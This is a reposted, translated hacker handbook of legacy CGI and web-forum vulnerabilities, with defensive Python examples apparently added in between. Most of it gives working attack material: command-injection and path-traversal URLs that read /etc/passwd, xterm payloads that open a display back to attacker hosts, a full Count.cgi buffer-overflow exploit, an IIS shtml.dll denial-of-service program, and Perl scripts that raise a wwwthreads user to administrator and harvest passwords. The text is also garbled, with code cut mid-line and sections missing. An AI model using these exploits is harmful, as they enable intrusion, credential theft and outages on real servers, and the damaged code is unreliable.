
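[Repost] Network Program Attack Handbook

Author: 无用君 [ISFOCUS]

A while ago I read Xiao Xu's "CGI Vulnerability Attack Handbook version-0.02" and felt that articles of this kind really are important. But attacks on network programs are no longer limited to CGI and pl programs, so this time I collected some common ASP program vulnerabilities from the web and added them, renamed the result "Network Program Attack Handbook", and fixed the incompleteness of the section attacking the Count.cgi program in the original "CGI Vulnerability Attack Handbook version-0.02". I hope it is helpful to everyone!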

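1. The phf vulnerability
 The phf vulnerability seems to be the most classic one; almost every article covers it. It allows commands to be executed on the server, for example to display /etc/passwd: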

 lynx http://www.victim.com/cgi-bin/ph ... n/cat%20/etc/passwd

 But can we still find it anywhere?

2. Vulnerability in php.cgi 2.0beta10 or earlier
 It can read every file readable with nobody's privileges.

 lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

 php.cgi version 2.1 can only read shtml files. As for the password file, note that it may instead be at /etc/master.passwd, /etc/security/passwd and so on.

3. whois_raw.cgi

 lynx http://www.victim.com/cgi-bin/wh ... 0Acat%20/etc/passwd
 lynx http://www.victim.com/cgi-bin/wh ... =%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

4. faxsurvey

 lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. textcounter.pl
 If textcounter.pl is present on the server, anyone can execute commands with the privileges of the http daemon.

 #!/usr/bin/perl
 $URL='http://dtp.kappa.ro/a/test.shtml';# please _DO_ _modify_ this
 $EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
 if ($ARGV[0]) { $CMD=$ARGV[0];}else{
 $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail $ -sanothere_one";
 }$text="$/;IFS=8;$;echo|";$text =~ s/ /$/g;#print "$textn";
 system( "wget", $text, "-O/dev/null");
 system( "wget", $text, "-O/dev/null");
 #system( "lynx", $text); # lynx can be used instead if the wget command is not available
 #system( "lynx", $text);

6. Vulnerability in some versions (1.1) of info2www
 $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami $
 You have new mail.
 $

 To be honest, I don't really understand this one. :(

7. pfdispaly.cgi

 lynx -source
 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

 pfdispaly.cgi has another vulnerability that allows commands to be executed:

 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
 or
 lynx -dump
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap

 lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

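9. www-sql
 This lets you read some restricted pages. For example, enter this in your browser:

 http://your.server/protected/something.html

 and you are asked for an account name and password. With www-sql that is not necessary:

 http://your.server/cgi-bin/www-sql/protected/something.html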

10. view-source

 lynx http://www.victim.com/cgi-bin/vi ... ../../../etc/passwd

11. campas

 lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais

 telnet www.victim.com 80
 POST /cgi-bin/webgais HTTP/1.0
 Content-length: 85 (replace this with the actual length of the "exploit"line)
 query=';mail+drazvan@pop3.kappa.ro

13. websendmail

 telnet www.victim.com 80
 POST /cgi-bin/websendmail HTTP/1.0
 Content-length: xxx (should be replaced with the actual length of the
 string passed to the server, in this case xxx=90)
 receiver=;mail+your_address@somewhere.org

14. handler

 telnet www.victim.com 80
 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
 or
 GET /cgi-bin/handler/blah;xwsh-displayyourhost.com|?data=Download
 or
 GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download

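 Note that cat is followed by a TAB character, not a space. The server reports that it cannot open useless_shit but still executes the command that follows.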

15. test-cgi

 lynx http://www.victim.com/cgi-bin/test-cgi?whatever
 CGI/1.0 test script report:

 argc is 0. argv is .

 SERVER_SOFTWARE = NCSA/1.4B
 SERVER_NAME = victim.com
 GATEWAY_INTERFACE = CGI/1.1
 SERVER_PROTOCOL = HTTP/1.0
 SERVER_PORT = 80
 REQUEST_METHOD = GET
 HTTP_ACCEPT = text/plain, application/x-html, application/html,
 text/html, text/x-html
 PATH_INFO =
 PATH_TRANSLATED =
 SCRIPT_NAME = /cgi-bin/test-cgi
 QUERY_STRING = whatever
 REMOTE_HOST = fifth.column.gov
 REMOTE_ADDR = 200.200.200.200
 REMOTE_USER =
 AUTH_TYPE =
 CONTENT_TYPE =
 CONTENT_LENGTH =
 This yields some of the http directories.

 lynx http://www.victim.com/cgi-bin/te ... n/cat%20/etc/passwd
 This trick doesn't seem to work. :(
 lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
 You can also try it like this:
 GET /cgi-bin/test-cgi?* HTTP/1.0
 GET /cgi-bin/test-cgi?x *
 GET /cgi-bin/nph-test-cgi?* HTTP/1.0
 GET /cgi-bin/nph-test-cgi?x *
 GET /cgi-bin/test-cgi?x HTTP/1.0 *
 GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *


16. With Apache on some BSD systems you can:

 lynx http://www.victim.com/root/etc/passwd
 lynx http://www.victim.com/~root/etc/passwd

17. htmlscript

 lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
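
 The requests listed so far (phf through htmlscript) share a few recognizable shapes: a well-known sample script under /cgi-bin/ combined with path traversal, an encoded control character, a shell metacharacter or a password-file path. The detector below is an added example, not part of the original article; the log lines are constructed from URLs shown above, and the rule names and severity levels are this example's own choices.

```python
import re
from urllib.parse import unquote

# Script names taken from the entries above (phf through htmlscript).
LEGACY_CGI = {
    "phf", "php.cgi", "whois_raw.cgi", "faxsurvey", "textcounter.pl",
    "info2www", "pfdispaly.cgi", "wrap", "www-sql", "view-source",
    "campas", "webgais", "websendmail", "handler", "test-cgi",
    "nph-test-cgi", "htmlscript",
}

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
SCRIPT_RE = re.compile(r"/cgi-bin/([^/?;\s]+)")

# Rules run against the target after one URL-decoding pass.
RULES = [
    ("path-traversal", re.compile(r"(?:^|[/\\?=&])\.\.(?:[/\\]|$)")),
    ("control-char", re.compile(r"[\x00-\x1f\x7f]")),   # %0a, TAB, ...
    ("shell-metachar", re.compile(r"[;|`$<>]")),        # '&' left out: query separator
    ("sensitive-file",
     re.compile(r"/etc/(?:passwd|master\.passwd|security/passwd)")),
]

# Constructed sample log (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2000:13:55:36 +0000] "GET /index.html HTTP/1.0" 200 2326',
    '192.0.2.11 - - [10/Oct/2000:13:56:01 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 812',
    '192.0.2.12 - - [10/Oct/2000:13:56:40 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0" 200 640',
    '192.0.2.13 - - [10/Oct/2000:13:57:12 +0000] "GET /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.0" 200 640',
    '192.0.2.14 - - [10/Oct/2000:13:58:03 +0000] "GET /cgi-bin/test-cgi?x HTTP/1.0 *" 200 1200',
    '192.0.2.15 - - [10/Oct/2000:13:59:30 +0000] "GET /cgi-bin/search.cgi?q=apache&page=2 HTTP/1.0" 200 512',
]


def split_request(request):
    """Return (method, target); the target keeps any junk after the URL."""
    method, _, rest = request.partition(" ")
    # Only a protocol token at the very end is stripped, so a request line
    # with extra tokens after "HTTP/1.0" leaves whitespace in the target.
    target = re.sub(r" HTTP/\d\.\d$", "", rest)
    return method, target


def analyze(line):
    """Return a finding dict for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _method, raw_target = split_request(m.group("request"))
    decoded = unquote(raw_target)
    hits = []
    script = SCRIPT_RE.search(decoded)
    if script and script.group(1) in LEGACY_CGI:
        hits.append("legacy-cgi:" + script.group(1))
    if re.search(r"\s", raw_target):
        hits.append("malformed-request-line")
    hits += [name for name, rx in RULES if rx.search(decoded)]
    if not hits:
        return None
    others = [h for h in hits if not h.startswith("legacy-cgi:")]
    if len(others) < len(hits) and others:
        severity = "high"      # known script plus a suspicious argument
    elif others:
        severity = "medium"    # suspicious argument, unknown script
    else:
        severity = "low"       # known script requested, nothing else odd
    return {"host": m.group("host"), "status": m.group("status"),
            "target": raw_target, "rules": hits, "severity": severity}


def scan(lines):
    """Analyze every line and keep only the findings."""
    return [f for f in map(analyze, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["severity"], finding["host"], finding["rules"])
```

 The decoder makes a single pass, so double-encoded input (%252e and the like) needs a second rule or a second pass if the server in front of the scripts decodes twice.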

18. jj.c

 The demo cgi program jj.c calls /bin/mail without filtering user
 input, so any program based on jj.c could potentially be exploited by
 simply adding a followed by a Unix command. It may require a
 password, but two known passwords include HTTPdrocks and SDGROCKS. If
 you can retrieve a copy of the compiled program, running strings on it
 will probably reveal the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.
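
 jj.c, like the webgais and websendmail requests earlier on this page, hands a form value to a mail program through a shell. The following is an added example, not code from jj.c: it runs a shell command line built by concatenation (with `echo` standing in for /bin/mail) next to a handler that validates the recipient and feeds the message to the mailer on standard input with no shell involved. The function names are hypothetical, and `/usr/sbin/sendmail -t -i` as the default mailer is an assumption about the host.

```python
import re
import subprocess
import sys
from email.message import EmailMessage

# Deliberately narrow address syntax: no spaces, quotes or shell characters.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Stand-in mailer for offline runs: copies stdin to stdout (an assumption
# of this example, used in place of the real sendmail binary).
ECHO_MAILER = (sys.executable, "-c",
               "import sys; sys.stdout.write(sys.stdin.read())")


def run_like_jj(receiver):
    """The unfiltered pattern: the form value becomes part of a shell
    command line. 'echo' stands in for /bin/mail so the effect is visible
    and harmless."""
    done = subprocess.run("echo " + receiver, shell=True,
                          capture_output=True, text=True)
    return done.stdout.splitlines()


def validate_recipient(receiver):
    """Accept one plain address; reject everything else outright."""
    if len(receiver) > 254 or not ADDRESS_RE.fullmatch(receiver):
        raise ValueError("recipient is not a plain e-mail address")
    return receiver


def build_message(receiver, subject, body):
    """Build the message; CR/LF in a header field would allow extra
    headers (for example an added Bcc:), so it is refused."""
    if "\r" in subject or "\n" in subject:
        raise ValueError("line break in subject")
    msg = EmailMessage()
    msg["To"] = validate_recipient(receiver)
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


def send(receiver, subject, body,
         mailer=("/usr/sbin/sendmail", "-t", "-i")):
    """Hardened form: argv is a fixed list, there is no shell, and the
    recipient travels in the To: header read by 'sendmail -t', so user
    input never reaches the command line at all."""
    msg = build_message(receiver, subject, body)
    done = subprocess.run(list(mailer), input=msg.as_bytes(),
                          capture_output=True, check=True)
    return done.stdout


if __name__ == "__main__":
    crafted = "user@example.org; echo INJECTED"   # constructed input
    print(run_like_jj(crafted))                   # two commands ran
    try:
        send(crafted, "survey", "hello", mailer=ECHO_MAILER)
    except ValueError as err:
        print("rejected:", err)
    print(send("user@example.org", "survey", "hello",
               mailer=ECHO_MAILER).decode())
```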

19. FrontPage extensions
 If you read http://www.victim.com/_vti_inf.html you get the version of the FP extensions
 and their path on the server. There are also some password files, such as:

http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

20. Freestats.com CGI
 I have not come across this one, and I feel some parts of it must not be gotten wrong, so I am pasting the English directly.

 John Carltonfound following. He developedan exploitfor the
 free web stats services offered at freestats.com, and supplied the
 webmaster with proper code to patch the bug.

 Start anaccount withfreestats.com, andlog in. Click on the
 area thatsays "CLICKHERE TOEDIT YOURUSER PROFILE & COUNTER
 INFO" This willcall up afile called edit.plwith your user#
 and password included in it.Save this file to your hard disk and
 open itwith notepad. The onlyform ofsecurity inthis is a
 hiddenattributeontheformelementof your account number.
 Change this from

 *input type=hidden name=account value=your#*

 to

 *input type=text name=account value=""*

 Save your page and load it into your browser.Their will now be a
 text input box where the hidden element was before.Simply type a
 # in and push the "click here to update user profile" and allthe
 information that appearson your screenhas now beenwritten to
 that user profile.

 But that isn't the worst of it.By using frames (2 frames, one to
 hold this pageyou just made,and one asa target forthe form
 submission) you could change the password on all of their accounts
 with a simple javascript function.

 Deep inside the web site authors still have the good old "edit.pl"
 script. It takes some time to reach it (unlike the path described)
 but you can reach it directly at:

 http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
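
 The weakness described above is that edit.pl takes the account number from a form field that the client controls; whether the field is hidden or visible makes no difference to the server. The following is an added example, not Freestats code: the handler names, the in-memory profile store and the HMAC session token are assumptions made for illustration. It contrasts a handler that trusts the submitted `account` field with one that derives the account from a token the server can verify.

```python
import hashlib
import hmac
import secrets

SESSION_KEY = secrets.token_bytes(32)   # stays on the server


def fresh_profiles():
    """Constructed sample data: two accounts and their profile e-mail."""
    return {"1001": {"email": "owner1001@example.org"},
            "1002": {"email": "owner1002@example.org"}}


def _mac(account):
    return hmac.new(SESSION_KEY, account.encode(), hashlib.sha256).hexdigest()


def issue_session(account):
    """Called once, after the password check at login succeeds."""
    return account + "." + _mac(account)


def account_from_session(token):
    """Recover the account from the token, rejecting any tampering."""
    account, sep, tag = token.partition(".")
    if not sep or not hmac.compare_digest(tag.encode(), _mac(account).encode()):
        raise PermissionError("session token failed verification")
    return account


def update_profile_trusting_form(profiles, form):
    """Pattern from the advisory: the account to modify is whatever the
    form says, so editing the saved page changes whose profile is written."""
    account = form["account"]
    profiles[account]["email"] = form["email"]
    return account


def update_profile_bound(profiles, session_token, form):
    """Corrected pattern: the account comes from the verified session.
    A submitted 'account' field is at most cross-checked, never used."""
    account = account_from_session(session_token)
    submitted = form.get("account")
    if submitted is not None and submitted != account:
        raise PermissionError("form account does not match session")
    profiles[account]["email"] = form["email"]
    return account


if __name__ == "__main__":
    profiles = fresh_profiles()
    # Logged in as 1001, but the edited form names 1002.
    form = {"account": "1002", "email": "changed@example.net"}
    update_profile_trusting_form(profiles, form)
    print("trusting handler wrote:", profiles["1002"])

    profiles = fresh_profiles()
    token = issue_session("1001")
    try:
        update_profile_bound(profiles, token, form)
    except PermissionError as err:
        print("bound handler refused:", err)
    print("1002 unchanged:", profiles["1002"])
```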

21. Vulnerability in Glimpse HTTP

 telnet target.machine.com 80
 GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com HTTP/1.0

22. Count.cgi
 This program only works against Count.cgi versions below 24:

 /*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);

/* Constants */
char shell[]=
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxffxffxffxff";



int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;


offset = sp = cnt = ver = 0;
fprintf(stderr,"t%s - Gusn",argv[0]);
if (argc<3) usage(argv[0]);

while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case &#39;h&#39;:
host = optarg;
break;
case &#39;d&#39;:
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case &#39;v&#39;:
ver = atoi(optarg);
break;
case &#39;o&#39;:
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

sp = offset + getsp(ver);


(void)doit(host,sp,shellcode);

exit(0);
}

unsigned long getsp(int ver) {

/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;

if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don&#39;t have an sp for that version try using the -o option.n");
fprintf(stderr,"Versions above 24 are patched for this bug.n");
exit(1);
} else {
return sp;
}

}


int usage (char *name) {
fprintf(stderr,"tUsage:%s -h host -d <display> -v <version> [-o <offset>]n",name);
fprintf(stderr,"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22n",name);
exit(1);
}

int openhost (char *host, int port) {

int sock;
struct hostent *he;
struct sockaddr_in sa;

he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostnamen");
exit(-1);
}

memcpy(&sa.sin_addr, he->h_addr, he->h_length);

sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));

if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}

return(sock);
}


void doit (char *host,long sp, char *shellcode) {

int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";

bzero(buf);


for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;

qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/Count.cgi?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"nn",2);
sleep(1);

/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn",qs,qs); */

/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./Count.cgi");
*/
}


Usage: count -h <target IP> -d <display> -v <Count.cgi version>
Example: count -h www.foo.bar -d 127.0.0.1:0 -v 22


Viewing images with Count.cgi

http://attacked.host.com/cgi-bin ... ath_to_gif/file.gif

23. finger.cgi

 lynx http://www.victim.com/cgi-bin/finger?@localhost

 This gives the usernames logged in on the host.

24. man.sh

 Robert Moniot found following. The May 1998 issue of SysAdmin
 Magazine contains an article, "Web-Enabled Man Pages", which
 includes source code for very nice cgi script named man.sh to feed
 man pages to a web browser. The hypertext links to other man
 pages are an especially attractive feature.

 Unfortunately, this script is vulnerable to attack. Essentially,
 anyone who can execute the cgi thru their web browser can run any
 system commands with the user id of the web server and obtain the
 output from them in a web page.

25. FormHandler.cgi
 Add the following to the form

 and /etc/passwd arrives in your mailbox.

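26. JFS
 I believe everyone has read the article "The detailed process of JFS breaking into the PCWEEK-LINUX host"; he used the photoads
 CGI module to break into the host. I have not actually carried out this attack; my understanding from reading the article is as follows.

 First, lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?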
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%
0a11111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa
ssword=0&CityStPhone=0&Renewed=0"

 After creating a new AD value to get past the $AdNum check, use

 lynx &#39;http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif&#39;

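 This creates or overwrites any file that the user nobody has permission to write.
 I am not sure whether my understanding is right. I cannot find the to_url script in its zip package; does anyone know about it?

27. backdoor
 I see that some current versions of cgichk.c check for the trojans unlg1.1 and rwwwshell.pl.
 The former was written by UnlG, and I have not seen its source code; the other one was written by THC, and packetstorm has the source code of its version 1.6.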



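28. shtml.dll
On FrontPage Extension Server / Windows 2000 Server, requesting a file that does not exist reveals the local path of the web directory:
http://www.victim.com/_vti_bin/shtml.dll/something.html
This returns the following message:
Cannot open "d:inetpubwwwrootpostinfo1.html": no such file or folder.
But if we request a file whose extension is not HTML, SHTML or ASP, we get a different message:
http://207.69.190.42/_vti_bin/shtml.dll/something.exe

shtml.dll recognizes and processes even fairly long file names that carry an html extension. This can be used to carry out a DoS attack against an IIS server. The following program can drive the target server's CPU usage to 100% and use up all of the application log space; within a few minutes the system reports that the application log is full: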

#include<stdio.h>
#include<string.h>
#include<winsock.h>
#include<windows.h>
#include<process.h>

void Dos(void *chara);

void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc < 2)
{
printf("Usage: %s IPn",argv[0]);
exit(1);
return ;
}

wVersionRequested = MAKEWORD( 2, 2 );

err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
 return;
}



 if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )
 {
 WSACleanup( );
 return;
 }


printf("wait ...n");
for (lDo = 0 ;lDo < 1000;lDo++)
{
//printf("1n");
 _beginthread(Dos, 0, (void*)argv[1]);
}
Sleep( 1000000L );
}

void Dos(void *chara)
{
long lLen;
long lDo ;
char *ip ;
char buffer[2000];
struct sockaddr_in serv_addr;
SOCKET sockfd ;
char plusvuln[]="GET /_vti_bin/shtml.dll/";
ip= (char*)chara;
memset(buffer,&#39;

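42. wwwthreads
wwwthreads is a widely used forum program that is used on quite a few security forums outside China. This forum software has a vulnerability: its SQL information retrieval engine allows remote users to obtain usernames and passwords, and allows an intruder to use SQL insert commands to gain access to the database. It was tested successfully on the forum of one of the world's best-known hacker sites.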


Exploit:
-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a &#39;&#39; before the &#39;$&#39; characters
$passhash="$1$V2$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d&#39;Administrator&#39;,U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.plrnrn";

print sendraw($tosend);

sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr;my @in=<S>;
select(STDOUT);close(S);
return @in;
} else { die("Can&#39;t connect...n"); ]
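
In the request built by wwwthreads.pl above, the `sort_order` parameter carries extra `column=value` pairs, which only has an effect if the server pastes that parameter into an UPDATE statement. The following is an added example, not wwwthreads code: the table name, the `U_Sort` column and the function names are assumptions, and an in-memory SQLite database stands in for the forum's database. It shows a statement built by concatenation next to one that validates the value and binds it as a parameter.

```python
import re
import sqlite3

# sort_order as sent by the script above (taken from the page).
CRAFTED_SORT_ORDER = "5,U_Status='Administrator',U_Security=100"


def make_db():
    """Constructed schema: U_Status and U_Security are the column names
    seen in the request; the table name and U_Sort are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (U_Username TEXT PRIMARY KEY, "
               "U_Status TEXT, U_Security INTEGER, U_Sort INTEGER)")
    db.execute("INSERT INTO Users VALUES ('rfp', 'User', 0, 1)")
    return db


def user_row(db, username):
    """Return (U_Status, U_Security, U_Sort) for one user."""
    return db.execute("SELECT U_Status, U_Security, U_Sort FROM Users "
                      "WHERE U_Username = ?", (username,)).fetchone()


def change_display_concat(db, username, sort_order):
    """Vulnerable pattern: a 'numeric' preference is pasted unquoted into
    the SET clause, so a comma in it starts further assignments."""
    quoted_user = username.replace("'", "''")
    sql = ("UPDATE Users SET U_Sort = " + sort_order +
           " WHERE U_Username = '" + quoted_user + "'")
    db.execute(sql)
    return sql


def change_display_bound(db, username, sort_order, max_sort=9):
    """Corrected pattern: accept only a small integer, then bind it.
    Either measure alone stops the request; together they also keep
    unexpected values out of the column."""
    if not re.fullmatch(r"[0-9]{1,2}", sort_order):
        raise ValueError("sort_order must be a number")
    value = int(sort_order)
    if not 1 <= value <= max_sort:
        raise ValueError("sort_order out of range")
    db.execute("UPDATE Users SET U_Sort = ? WHERE U_Username = ?",
               (value, username))
    return value


if __name__ == "__main__":
    db = make_db()
    print(change_display_concat(db, "rfp", CRAFTED_SORT_ORDER))
    print("after concatenated update:", user_row(db, "rfp"))

    db = make_db()
    try:
        change_display_bound(db, "rfp", CRAFTED_SORT_ORDER)
    except ValueError as err:
        print("bound update refused:", err)
    print("row unchanged:", user_row(db, "rfp"))
```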


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you&#39;re administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a &#39;&#39; before the &#39;$&#39; characters
$passhash="$1$V2$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,&#39;0ABCDEFGHIJKLMNOPQRSTUVWXYZ&#39;);
print STDERR "wwwthreads password snatcher by rain forest puppyrn";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/rn".
"Cookie: Username=$username; Password=$passhashrnrn";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser.pl?User=([^"]+)">/){
push @users, $1;]}

$usercount=@users;
print STDERR "$usercount users retrieved.rn".
"Fetching individual passwords...rn";

foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0rn".
"Referer: http://$ip/cgi-bin/wwwthreads/rn".
